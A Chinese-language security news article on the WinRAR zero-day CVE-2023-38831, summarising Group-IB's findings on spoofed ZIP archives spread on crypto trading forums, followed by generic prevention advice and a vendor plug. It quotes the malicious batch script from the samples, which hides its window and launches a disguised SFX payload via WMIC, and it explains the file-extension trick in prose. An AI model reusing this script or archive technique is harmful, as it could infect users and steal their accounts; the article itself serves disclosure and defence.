WinRAR再爆0 day漏洞,0 day漏洞该如何有效预防

WinRAR再爆0 day漏洞,已被利用超过4个月。 

Winrar是一款免费的主流压缩文件解压软件,支持绝大部分压缩文件格式的解压,全球用户量超过5亿。Group-IB研究人员在分析DarkMe恶意软件时发现WinRAR在处理ZIP文件格式时的一个漏洞,漏洞CVE编号为CVE-2023-38831。攻击者利用该漏洞可以创建欺骗性扩展的诱饵文件来隐藏恶意脚本,即将恶意脚本隐藏在伪装为.jpg、.txt和其他文件格式的压缩文件中,并窃取用户加密货币账户。

研究人员在分析DarkMe恶意软件时发现了一些可疑的ZIP文件。Group-IB在8个加密货币交易的主流论坛上发现了这些恶意ZIP文件,如图1所示:

WinRAR再爆0 day漏洞

图1. 交易论坛发布的帖子

CVE-2023-38831漏洞序列图如图2所示:

 

WinRAR再爆0 day漏洞

图2. CVE-2023-38831漏洞序列图

所有压缩文件都是用同一方法创建的,结构相同,包括一个诱饵文件和一个包含恶意文件和未使用文件的文件夹。当用户打开恶意压缩文件后,受害者机会看到一个图像文件和一个相同文件名的文件夹,如图3所示。

WinRAR再爆0 day漏洞

 图3. 恶意zip文件示例

如果受害者打开伪装为图像的诱饵文件,恶意脚本就会执行攻击的下一阶段,如图4所示:

WinRAR再爆0 day漏洞

图4. 攻击流程图

脚本的主要作用是进入攻击的下一阶段,这是通过运行最小化窗口来完成的。然后搜索两个特定文件“Screenshot_05-04-2023.jpg”和 “Images.ico”。JPG文件是受害者打开的图像,“Images.ico”是用来提取和启动新文件的SFX CAB压缩文件。恶意脚本示例如下:

@echo off
if not DEFINED IS_MINIMIZEDset IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exitcd %TEMP%for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') dofor /F "delims=" %%G in ('dir /b /s "Images.ico"') doWMIC process call create "%%~G" && "%%~K" && cd %CD% && exit
Exit

为了解漏洞工作原理,研究人员创建了2个与发现的恶意压缩文件结构相同的压缩文件。两个文件都包含图像文件,其中一个压缩文件中还包含一个存储脚本的内部文件夹,可以触发消息展示框。然后,研究人员修改了其中一个文件使其与恶意压缩文件一样。然后,比较WinRAR在解压不同压缩文件时的区别。

研究人员主要想确定在打开解压文件时会在%TEMP%/%RARTMPDIR%文件夹中创建什么文件。在原始的zip文件中,只会创建image.jpg文件。在恶意文件zip文件中,其中的文件夹内容也会被提取。

WinRAR再爆0 day漏洞

图5. 不同zip文件解压比较

也就是说,攻击发生在WinRAR尝试打开用户想要访问的文件时。ShellExecute函数接收到了打开文件的错误参数。图像文件名与搜索不匹配,引发其被跳过。然后就发现了批处理文件,并执行。

 

WinRAR再爆0 day漏洞

图6 漏洞复现

德迅云安全教您如何预防和防范0 day漏洞

及时更新软件和系统
及时更新软件和系统是预防零日漏洞的重要措施。厂商通常会在发现漏洞后发布相应的补丁程序,因此及时更新软件和系统可以避免被攻击者利用漏洞入侵系统。
强化网络安全防护
企业和个人应该建立完善的网络安全防护体系,包括网络防火墙、入侵检测系统、反病毒软件等,以及加密、身份验证、访问控制等技术手段。
增强安全意识和培训
企业和个人应该加强安全意识和培训,了解各种安全威胁和攻击方法,学习如何安全地使用互联网和各种应用程序。
加强漏洞管理
企业和个人应该加强漏洞管理,定期进行漏洞扫描和评估,及时修补发现的漏洞。同时,企业应建立漏洞披露和响应机制,及时接收并处理厂商发布的漏洞补丁。
限制权限和访问
企业和个人应该限制权限和访问,尽可能降低攻击者入侵系统的风险。例如,限制用户的访问权限、禁用不必要的服务和端口等。

良好的预防安全实践是必不可少的。这些实践包括谨慎地安装和遵守适应业务与应用需要的防火墙政策,随时升级防病毒软件,阻止潜在有害的文件附件,随时修补所有系统抵御已知漏洞。漏洞扫描是评估预防规程有效性的好办法。而为了避免0day漏洞的出现,软件厂商和安全研究人员通常会进行安全审计和漏洞挖掘工作,以尽早发现并修复可能存在的漏洞。如企业方面对这块的防护模式有疑问也可以咨询网络安全服务商德迅云安全这类来提供安全防护方案。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/610692.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MAC M1版IDEA热部署JRebel

1、在idea里面安装jrebel插件 2、下载激活工具:ReverseProxy_darwin_amd64 下载地址(Mac早期用户使用Safari下载,不要用Chrome,否则下载之后会把.dms后缀名去掉) 特别注意:M1用户请使用下面的下载&#xff…

探探各个微前端框架

本文作者为 360 奇舞团前端开发工程师 微前端架构是为了在解决单体应用在一个相对长的时间跨度下,由于参与的人员、团队的增多、变迁,从一个普通应用演变成一个巨石应用(Frontend Monolith)后,随之而来的应用不可维护的问题。这类问题在企业级…

基于模型预测算法的含储能微网双层能量管理模型

基于模型预测算法的含储能微网双层能量管理模型 文章目录 基于模型预测算法的含储能微网双层能量管理模型一、项目介绍二、源程序下载 一、项目介绍 代码主要做的是一个微网双层优化调度模型,微网聚合单元包括风电、光伏、储能以及超级电容器,在微网的运…

手动实现简易版RPC(下)

手动实现简易版RPC(下) 前言 什么是RPC?它的原理是什么?它有什么特点?如果让你实现一个RPC框架,你会如何是实现?带着这些问题,开始今天的学习。 接上一篇博客 手动实现简易版RPC(上&#xff…

OpenHarmony4.0分布式任务调度浅析

1 概述 OpenHarmony 分布式任务调度是一种基于分布式软总线、分布式数据管理、分布式 Profile 等技术特性的任务调度方式。它通过构建一种统一的分布式服务管理机制,包括服务发现、同步、注册和调用等环节,实现了对跨设备的应用进行远程启动、远程调用、…

动态规划-入门三道题

1137. 第 N 个泰波那契数 题目描述: 状态表示: dp[i]表示第i个泰波那契数。 状态转移方程: dp[i]dp[i-3]dp[i-2]dp[i-1]。 初始化: 动态规划问题的初始化就是为了去避免初始情况下的越界问题。这里就对dp[0]0,dp[1]1,dp[2]1这样进行初始化即可&#xf…

学习笔记之——3DGS-SLAM系列代码解读

最近对一系列基于3D Gaussian Splatting(3DGS)SLAM的工作的源码进行了测试与解读。为此写下本博客mark一下所有的源码解读以及对应的代码配置与测试记录~ 其中工作1~5的原理解读见博客: 学习笔记之——3D Gaussian Splatting及其在SLAM与自动…

云计算:Linux 部署 OVS 集群(服务端)实现VXLAN

目录 一、实验 1.环境 2.Linux 部署 OVS 集群(服务端) 3.Linux 部署VXLAN 一、实验 1.环境 (1) 主机 表1 宿主机 主机架构软件IP备注ovs_controller控制端192.168.204.63 1个NAT网卡 (204网段) ovs_server01服务端 Openv…

Redis探秘Sentinel(哨兵模式):原理、机制与实战

Redis Sentinel,即Redis哨兵模式,是一种基于分布式架构的高可用解决方案,旨在实现Redis主从集群的自动故障检测、故障转移与配置更新。本文将深入剖析Sentinel的工作原理、核心机制与实战应用,帮助您全面理解并有效运用这一强大工…

关于MCU产品开发参数存储的几种方案

关于MCU产品开发参数存储的几种方案 Chapter1 关于MCU产品开发参数存储的几种方案Chapter2 单片机参数处理[保存与读取]Chapter3 嵌入式设备参数存储技巧Chapter4 STM32硬件I2C的一点心得(AT24C32C和AT24C64C) Chapter1 关于MCU产品开发参数存储的几种方案 原文链接 在工作中…

Python-VBA函数之旅-chr函数

目录 1、chr函数: 1-1、Python: 1-2、VBA: 2、相关文章: 个人主页:非风V非雨-CSDN博客 chr函数在Python编程中有多种应用场景,它主要用于将Unicode码点转换为对应的字符。常见的应用场景有&#xff1a…

性能优化“万金油”:缓存Cache

1、首次请求数据时,先从缓存中获取,如果没有,则继续向数据库中获取。获取到数据后,将数据保存到缓存中。再次请求数据,一样先从缓存中获取,成功获取,“缓存命中”。多次请求中,命中次数占全部请求次数的比例,叫“命中率”。如果数据源的数据发生变化,而缓存中的数据没…